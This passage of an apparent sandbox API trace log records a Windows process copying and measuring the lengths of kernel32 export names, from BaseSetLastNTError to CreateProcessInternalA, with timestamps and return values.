lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.145] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.145] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.145] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.146] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.146] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.146] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.146] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.146] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.146] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.146] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.146] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.146] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.146] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.146] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.146] lstrlenA (lpString="BEEP") returned 4 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.146] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.146] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.146] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.146] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.146] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.146] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.146] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.147] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.147] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.147] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.147] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.147] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.147] lstrlenA (lpString="CANCELIO") returned 8 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.147] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.147] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.147] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.147] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.147] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.147] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.147] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.147] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.147] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.147] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.147] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.147] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.148] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.148] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.148] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.148] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.148] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.148] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.148] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.148] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.148] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.148] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.148] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.148] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.148] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.148] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.148] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.148] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.148] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.148] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.149] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.149] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.149] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.149] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.149] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.149] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.149] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.149] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.149] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.149] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.149] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.149] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.149] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.149] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.149] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.149] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.149] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.149] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.150] lstrlenA (lpString="COPYFILEA") returned 9 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.150] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.150] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.150] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.150] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.150] lstrlenA (lpString="COPYFILEW") returned 9 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.150] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.150] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.150] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.150] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.150] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.150] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.150] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.150] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.150] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.150] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.150] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.150] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.150] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.151] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.151] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.151] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.151] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.151] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.151] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.151] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.151] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.151] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.151] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.151] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.151] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.151] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.151] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.151] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.151] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.151] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.151] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.152] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.152] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.152] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.152] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.152] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.152] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.152] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.152] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.152] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.152] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.152] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.152] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.152] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.152] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.152] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.152] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.152] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.152] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.153] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.153] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, 